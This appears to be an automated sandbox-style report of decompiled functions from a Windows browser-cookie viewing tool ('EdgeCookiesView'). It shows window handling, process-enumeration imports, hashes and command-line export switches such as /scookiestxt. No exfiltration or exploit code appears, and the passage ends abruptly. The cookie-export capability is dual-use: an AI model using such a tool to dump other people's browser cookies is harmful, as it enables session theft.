                                                                                                                                                                    						E004077CB( *((intOrPtr*)(__ecx + 0x69c)));
                                                                                                                                                                    					} else {
                                                                                                                                                                    						__eflags = _t75 - 0x41;
                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                    							memcpy( *((intOrPtr*)(__ecx + 0x698)) + 0x228, __ecx + 0x744, 0x200c);
                                                                                                                                                                    							E0040B00A(_t129);
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L32;
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_t139 == 0) {
                                                                                                                                                                    					_t38 = __ecx + 0x280;
                                                                                                                                                                    					 *_t38 =  *(__ecx + 0x280) & 0x00000000;
                                                                                                                                                                    					__eflags =  *_t38;
                                                                                                                                                                    					goto L22;
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_t118 == 6) {
                                                                                                                                                                    					__eflags = _a8 - 1;
                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                    						PostMessageW( *(__ecx + 0x208), 0x428, 0, 0);
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L32;
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_t118 == 0xc) {
                                                                                                                                                                    					__eflags = E0040546C(_a12, L"EdgeCookiesView");
                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                    						goto L32;
                                                                                                                                                                    					}
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_t118 == 0x20) {
                                                                                                                                                                    					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x214));
                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                    						goto L32;
                                                                                                                                                                    					}
                                                                                                                                                                    					SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                                                                                    					return 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_t118 == 0x2b) {
                                                                                                                                                                    					_t115 = _a12;
                                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t115 + 0x14)) -  *((intOrPtr*)(__ecx + 0x214));
                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                    						goto L32;
                                                                                                                                                                    					}
                                                                                                                                                                    					__eflags =  *(__ecx + 0x694);
                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                    						L14:
                                                                                                                                                                    						SetBkMode( *(_t115 + 0x18), 1);
                                                                                                                                                                    						SetTextColor( *(_t115 + 0x18), 0xff0000);
                                                                                                                                                                    						_t97 = SelectObject( *(_t115 + 0x18),  *(_t129 + 0x694));
                                                                                                                                                                    						asm("stosd");
                                                                                                                                                                    						asm("stosd");
                                                                                                                                                                    						asm("stosd");
                                                                                                                                                                    						asm("stosd");
                                                                                                                                                                    						_t131 = _a12;
                                                                                                                                                                    						_v28 = 0x14;
                                                                                                                                                                    						_v20 = 5;
                                                                                                                                                                    						DrawTextExW( *(_t131 + 0x18), _v8 + 0x492, 0xffffffff, _t131 + 0x1c, 0x24,  &_v28);
                                                                                                                                                                    						SelectObject( *(_t131 + 0x18), _t97);
                                                                                                                                                                    						_t129 = _v8;
                                                                                                                                                                    						goto L32;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t105 = GetDeviceCaps( *(_t115 + 0x18), 0x5a);
                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                    					_t124 = 0x60;
                                                                                                                                                                    					_t136 = _t105 * 0xe / _t124;
                                                                                                                                                                    					_t108 =  *(__ecx + 0x694);
                                                                                                                                                                    					__eflags = _t108;
                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                    						DeleteObject(_t108);
                                                                                                                                                                    						_t16 = __ecx + 0x694;
                                                                                                                                                                    						 *_t16 =  *(__ecx + 0x694) & 0x00000000;
                                                                                                                                                                    						__eflags =  *_t16;
                                                                                                                                                                    					}
                                                                                                                                                                    					 *(_t129 + 0x694) = E004058D4(_t136);
                                                                                                                                                                    					goto L14;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					if(_t118 == 0x7b) {
                                                                                                                                                                    						_t126 = _a8;
                                                                                                                                                                    						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x69c)) + 0x2ac))) {
                                                                                                                                                                    							E0040B607(__ecx, _t126);
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L32;
                                                                                                                                                                    				}
                                                                                                                                                                    			}

























                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040b893
                                                                                                                                                                    0x0040b89a
                                                                                                                                                                    0x0040b8d7
                                                                                                                                                                    0x0040b8dc
                                                                                                                                                                    0x0040b8ea
                                                                                                                                                                    0x0040b8ff
                                                                                                                                                                    0x0040b908
                                                                                                                                                                    0x0040b909
                                                                                                                                                                    0x0040b90a
                                                                                                                                                                    0x0040b90b
                                                                                                                                                                    0x0040b90c
                                                                                                                                                                    0x0040b927
                                                                                                                                                                    0x0040b92e
                                                                                                                                                                    0x0040b935
                                                                                                                                                                    0x0040b93f
                                                                                                                                                                    0x0040b941
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040b941
                                                                                                                                                                    0x0040b8a1
                                                                                                                                                                    0x0040b8aa
                                                                                                                                                                    0x0040b8ad
                                                                                                                                                                    0x0040b8b0
                                                                                                                                                                    0x0040b8b2
                                                                                                                                                                    0x0040b8b8
                                                                                                                                                                    0x0040b8ba
                                                                                                                                                                    0x0040b8bd
                                                                                                                                                                    0x0040b8c3
                                                                                                                                                                    0x0040b8c3
                                                                                                                                                                    0x0040b8c3
                                                                                                                                                                    0x0040b8c3
                                                                                                                                                                    0x0040b8d1
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040b857
                                                                                                                                                                    0x0040b85a
                                                                                                                                                                    0x0040b866
                                                                                                                                                                    0x0040b86f
                                                                                                                                                                    0x0040b877
                                                                                                                                                                    0x0040b877
                                                                                                                                                                    0x0040b86f
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040b85a

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 0040B8A1
                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B8BD
                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040B8DC
                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040B8EA
                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0040B8FF
                                                                                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 0040B935
                                                                                                                                                                    • SelectObject.GDI32(00000014,00000000), ref: 0040B93F
                                                                                                                                                                      • Part of subcall function 0040B607: GetCursorPos.USER32(?), ref: 0040B614
                                                                                                                                                                      • Part of subcall function 0040B607: GetSubMenu.USER32 ref: 0040B622
                                                                                                                                                                      • Part of subcall function 0040B607: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B64F
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040B95A
                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 0040B963
                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040B96A
                                                                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040B9B0
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040B9F9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CursorObject$MenuSelectText$CapsColorDeleteDeviceDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
                                                                                                                                                                    • String ID: EdgeCookiesView
                                                                                                                                                                    • API String ID: 1858646182-2656830938
                                                                                                                                                                    • Opcode ID: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
                                                                                                                                                                    • Instruction ID: ea2783da8998489939a316812c4387a05210a4ff33434ae7ee18e9d7754e5edd
                                                                                                                                                                    • Opcode Fuzzy Hash: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
                                                                                                                                                                    • Instruction Fuzzy Hash: 4161BD71310205ABDB24AF64CC85BAAB7A5FF44310F10413AFA09B76E1D778AC618BDD
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040CA5A() {
                                                                                                                                                                    				void* _t1;
                                                                                                                                                                    				int _t2;
                                                                                                                                                                    				struct HINSTANCE__* _t4;
                                                                                                                                                                    
                                                                                                                                                                    				if( *0x413260 != 0) {
                                                                                                                                                                    					return _t1;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t2 = LoadLibraryW(L"psapi.dll");
                                                                                                                                                                    				_t4 = _t2;
                                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                                    					L10:
                                                                                                                                                                    					return _t2;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t2 = GetProcAddress(_t4, "GetModuleBaseNameW");
                                                                                                                                                                    					 *0x4128e8 = _t2;
                                                                                                                                                                    					if(_t2 != 0) {
                                                                                                                                                                    						_t2 = GetProcAddress(_t4, "EnumProcessModules");
                                                                                                                                                                    						 *0x4128e0 = _t2;
                                                                                                                                                                    						if(_t2 != 0) {
                                                                                                                                                                    							_t2 = GetProcAddress(_t4, "GetModuleFileNameExW");
                                                                                                                                                                    							 *0x4128d8 = _t2;
                                                                                                                                                                    							if(_t2 != 0) {
                                                                                                                                                                    								_t2 = GetProcAddress(_t4, "EnumProcesses");
                                                                                                                                                                    								 *0x412b0c = _t2;
                                                                                                                                                                    								if(_t2 != 0) {
                                                                                                                                                                    									_t2 = GetProcAddress(_t4, "GetModuleInformation");
                                                                                                                                                                    									 *0x4128e4 = _t2;
                                                                                                                                                                    									if(_t2 != 0) {
                                                                                                                                                                    										 *0x413260 = 1;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					if( *0x413260 == 0) {
                                                                                                                                                                    						_t2 = FreeLibrary(_t4);
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L10;
                                                                                                                                                                    				}
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(psapi.dll,?,0040C284), ref: 0040CA6D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040CA86
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040CA97
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0040CAA8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040CAB9
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040CACA
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040CAEA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                    • API String ID: 2449869053-70141382
                                                                                                                                                                    • Opcode ID: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
                                                                                                                                                                    • Instruction ID: 77b1fe70fa67b5f7b7b6e6a9f8f9c1ad54eab79ee609772bc806a346005bb9be
                                                                                                                                                                    • Opcode Fuzzy Hash: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
                                                                                                                                                                    • Instruction Fuzzy Hash: D101487078120ADDD751EB68AE84BAB3AF49B44B41B144237E405F12D4DBFC9882DF6C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                    			E0040BCAA(signed int __eax, void* __esi) {
                                                                                                                                                                    				void* _t5;
                                                                                                                                                                    				void* _t6;
                                                                                                                                                                    				void* _t7;
                                                                                                                                                                    				void* _t8;
                                                                                                                                                                    				void* _t9;
                                                                                                                                                                    				void* _t10;
                                                                                                                                                                    
                                                                                                                                                                    				_push(L"/shtml");
                                                                                                                                                                    				L0040E03E();
                                                                                                                                                                    				if(__eax != 0) {
                                                                                                                                                                    					_push(L"/sverhtml");
                                                                                                                                                                    					L0040E03E();
                                                                                                                                                                    					if(__eax != 0) {
                                                                                                                                                                    						_push(L"/sxml");
                                                                                                                                                                    						L0040E03E();
                                                                                                                                                                    						if(__eax != 0) {
                                                                                                                                                                    							_push(L"/stab");
                                                                                                                                                                    							L0040E03E();
                                                                                                                                                                    							if(__eax != 0) {
                                                                                                                                                                    								_push(L"/sjson");
                                                                                                                                                                    								L0040E03E();
                                                                                                                                                                    								if(__eax != 0) {
                                                                                                                                                                    									_push(L"/scomma");
                                                                                                                                                                    									L0040E03E();
                                                                                                                                                                    									if(__eax != 0) {
                                                                                                                                                                    										_push(L"/scookiestxt");
                                                                                                                                                                    										L0040E03E();
                                                                                                                                                                    										asm("sbb eax, eax");
                                                                                                                                                                    										return ( ~__eax & 0xfffffff8) + 8;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_t5 = 4;
                                                                                                                                                                    										return _t5;
                                                                                                                                                                    									}
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t6 = 3;
                                                                                                                                                                    									return _t6;
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t7 = 2;
                                                                                                                                                                    								return _t7;
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t8 = 7;
                                                                                                                                                                    							return _t8;
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t9 = 6;
                                                                                                                                                                    						return _t9;
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t10 = 5;
                                                                                                                                                                    					return _t10;
                                                                                                                                                                    				}
                                                                                                                                                                    			}










                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                    • String ID: /scomma$/scookiestxt$/shtml$/sjson$/stab$/sverhtml$/sxml
                                                                                                                                                                    • API String ID: 2081463915-1797186745
                                                                                                                                                                    • Opcode ID: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
                                                                                                                                                                    • Instruction ID: 8371893b6cdf142ed748882e6751911a4291a5e673982fbb48e018f7079fe289
                                                                                                                                                                    • Opcode Fuzzy Hash: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
                                                                                                                                                                    • Instruction Fuzzy Hash: 7C010C3228936569F9282577AD07B870649CB51BBAF30056FF924E81C1EFED8481605C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040C9D6() {
                                                                                                                                                                    				void* _t1;
                                                                                                                                                                    				_Unknown_base(*)()* _t2;
                                                                                                                                                                    				struct HINSTANCE__* _t4;
                                                                                                                                                                    
                                                                                                                                                                    				if( *0x41325c != 0) {
                                                                                                                                                                    					return _t1;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                    				_t4 = _t2;
                                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                                    					L9:
                                                                                                                                                                    					return _t2;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                                                                                                    				 *0x4128dc = _t2;
                                                                                                                                                                    				if(_t2 != 0) {
                                                                                                                                                                    					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                                                                                                    					 *0x4128d4 = _t2;
                                                                                                                                                                    					if(_t2 != 0) {
                                                                                                                                                                    						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                                                                                                    						 *0x4128d0 = _t2;
                                                                                                                                                                    						if(_t2 != 0) {
                                                                                                                                                                    							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                                                                                                    							 *0x412664 = _t2;
                                                                                                                                                                    							if(_t2 != 0) {
                                                                                                                                                                    								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                                                                                                    								 *0x4128c8 = _t2;
                                                                                                                                                                    								if(_t2 != 0) {
                                                                                                                                                                    									 *0x41325c = 1;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				goto L9;
                                                                                                                                                                    			}







APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0040C28B), ref: 0040C9E5
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040C9FE
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040CA0F
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040CA20
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040CA31
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040CA42
Strings
Memory Dump Source
• Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
• Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
• Instruction ID: 7b85a6ede3351e87d48595370c2c99752d77d7c7be9155cf3b7c884c9e88c84f
• Opcode Fuzzy Hash: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
• Instruction Fuzzy Hash: B2F06230651359D9C720EB256E80BEB2BE45785B40F149237E404F22D4EBBC84968FAC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
E004071D1(void* __eflags, wchar_t* _a4) {
	void* __esi;
	void* _t3;
	int _t6;

	_t3 = E004057D1(_a4);
	if(_t3 != 0) {
		wcscpy(0x412c38, _a4);
		wcscpy(0x412e48, L"general");
		_t6 = GetPrivateProfileIntW(0x412e48, L"rtl", 0, 0x412c38);
		asm("sbb eax, eax");
		 *0x412ecc =  ~(_t6 - 1) + 1;
		E00406D4D(0x412ed0, L"charset", 0x3f);
		E00406D4D(0x412f50, L"TranslatorName", 0x3f);
		return E00406D4D(0x412fd0, L"TranslatorURL", 0xff);
	}
	return _t3;
}







APIs
  • Part of subcall function 004057D1: GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5
• wcscpy.MSVCRT ref: 004071EB
• wcscpy.MSVCRT ref: 004071FB
• GetPrivateProfileIntW.KERNEL32 ref: 0040720C
  • Part of subcall function 00406D4D: GetPrivateProfileStringW.KERNEL32 ref: 00406D69
Strings
Memory Dump Source
• Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
• Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: PrivateProfilewcscpy$AttributesFileString
• String ID: 8,A$H.A$P/A$TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 3176057301-819253090
• Opcode ID: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
• Instruction ID: f115d196d4af7e8601c57319c09dc176dc9760a1553b0771dc73547d8c0c0b20
• Opcode Fuzzy Hash: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
• Instruction Fuzzy Hash: 96F0CD32FC036172C62176225E06F6B25148F91B15F15447BBC08FA5C2D6FC08669A9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040A5AB(void* __esi) {
	struct HDWP__* _v8;
	signed int _v12;
	int _v16;
	int _v20;
	intOrPtr _v24;
	struct tagRECT _v40;
	intOrPtr _v44;
	struct tagPOINT _v56;
	void* _t53;
	int _t99;
	void* _t101;

	_t101 = __esi;
	if( *((intOrPtr*)(__esi + 0x244)) != 0) {
		GetClientRect( *(__esi + 0x208),  &_v40);
		GetWindowRect( *(__esi + 0x214),  &_v56);
		_v20 = _v44 - _v56.y + 1;
		GetWindowRect( *(__esi + 0x218),  &_v56);
		_v16 = _v40.right - _v40.left;
		_t99 = _v44 - _v56.y + 1;
		_v24 = _v40.bottom - _v40.top;
		_v12 = 0xdc;
		if( *(__esi + 0x6d4) != 0) {
			GetWindowRect(GetDlgItem( *(__esi + 0x6d4), 0x40d),  &_v56);
			MapWindowPoints(0,  *(__esi + 0x6d4),  &_v56, 2);
			_v12 = _v44 + 6;
		}
		if( *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x698)) + 0x224)) == 0) {
			_v12 = _v12 & 0x00000000;
		}
		_v8 = BeginDeferWindowPos(4);
		DeferWindowPos(_v8,  *(_t101 + 0x218), 0, 0, 0, _v16, _t99, 4);
		DeferWindowPos(_v8,  *(_t101 + 0x214), 0, 0, _v40.bottom - _v20 + 1, _v16, _v20, 6);
		DeferWindowPos(_v8,  *( *((intOrPtr*)(_t101 + 0x69c)) + 0x2ac), 0, 0, _v12 + _t99, _v16, _v24 - _v12 - _t99 - _v20, 4);
		DeferWindowPos(_v8,  *(_t101 + 0x6d4), 0, 0, _t99, _v16, _v12, 4);
		return EndDeferWindowPos(_v8);
	}
	return _t53;
}















                                                                                                                                                                    APIs
                                                                                                                                                                    • GetClientRect.USER32 ref: 0040A5CA
                                                                                                                                                                    • GetWindowRect.USER32 ref: 0040A5E0
                                                                                                                                                                    • GetWindowRect.USER32 ref: 0040A5F6
                                                                                                                                                                    • GetDlgItem.USER32 ref: 0040A630
                                                                                                                                                                    • GetWindowRect.USER32 ref: 0040A637
                                                                                                                                                                    • MapWindowPoints.USER32 ref: 0040A647
                                                                                                                                                                    • BeginDeferWindowPos.USER32 ref: 0040A66B
                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A68E
                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A6AD
                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040A6D8
                                                                                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040A6F0
                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040A6F5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 552707033-0
                                                                                                                                                                    • Opcode ID: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
                                                                                                                                                                    • Instruction ID: 1e8564dccfd76f42bf82a6a58439150b57488fc8b3b7f8ee37cc979cf164ca84
                                                                                                                                                                    • Opcode Fuzzy Hash: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
                                                                                                                                                                    • Instruction Fuzzy Hash: 1E41B571900209FFDB11DBA8DD89FEEBBB6EB48304F100465E655B61A0C7716A549B14
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                    			E00403899(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                    				struct HDWP__* _v8;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				struct HDWP__* _t27;
                                                                                                                                                                    				intOrPtr* _t51;
                                                                                                                                                                    				RECT* _t56;
                                                                                                                                                                    
                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                    				_t51 = __ecx;
                                                                                                                                                                    				if(_a4 != 0x18) {
                                                                                                                                                                    					L4:
                                                                                                                                                                    					if(_a4 == 2) {
                                                                                                                                                                    						KillTimer( *(_t51 + 0x10), 0x41);
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a4 != 0x113) {
                                                                                                                                                                    						L11:
                                                                                                                                                                    						if(_a4 == 5) {
                                                                                                                                                                    							_t27 = BeginDeferWindowPos(5);
                                                                                                                                                                    							_t56 = _t51 + 0x40;
                                                                                                                                                                    							_v8 = _t27;
                                                                                                                                                                    							E004017E9(_t56, _t27, 0x40b, 0, 0, 1);
                                                                                                                                                                    							E004017E9(_t56, _v8, 0x40c, 1, 0, 0);
                                                                                                                                                                    							E004017E9(_t56, _v8, 0x40e, 1, 0, 0);
                                                                                                                                                                    							E004017E9(_t56, _v8, 0x40f, 1, 0, 0);
                                                                                                                                                                    							E004017E9(_t56, _v8, 0x40d, 0, 0, 1);
                                                                                                                                                                    							EndDeferWindowPos(_v8);
                                                                                                                                                                    							InvalidateRect( *(_t56 + 0x10), _t56, 1);
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L13;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						if(_a8 != 0x41 ||  *((intOrPtr*)(_t51 + 0x78)) == 0 || GetTickCount() -  *((intOrPtr*)(_t51 + 0x7c)) <= 0x1f4) {
                                                                                                                                                                    							L13:
                                                                                                                                                                    							return E004015CE(_t51, _a4, _a8, _a12);
                                                                                                                                                                    						} else {
                                                                                                                                                                    							 *((intOrPtr*)(_t51 + 0x78)) = 0;
                                                                                                                                                                    							 *((intOrPtr*)( *_t51 + 4))(0);
                                                                                                                                                                    							SendMessageW(GetParent( *(_t51 + 0x10)), 0x469, 0, 0);
                                                                                                                                                                    							goto L11;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_a8 == 0) {
                                                                                                                                                                    					KillTimer( *(__ecx + 0x10), 0x41);
                                                                                                                                                                    					goto L4;
                                                                                                                                                                    				}
                                                                                                                                                                    				SetTimer( *(__ecx + 0x10), 0x41, 0x64, 0);
                                                                                                                                                                    				goto L13;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004038BD
                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004038CD
                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004038DA
                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004038F8
                                                                                                                                                                    • GetParent.USER32(?), ref: 00403921
                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00403928
                                                                                                                                                                    • BeginDeferWindowPos.USER32 ref: 00403936
                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 00403998
                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004039A4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
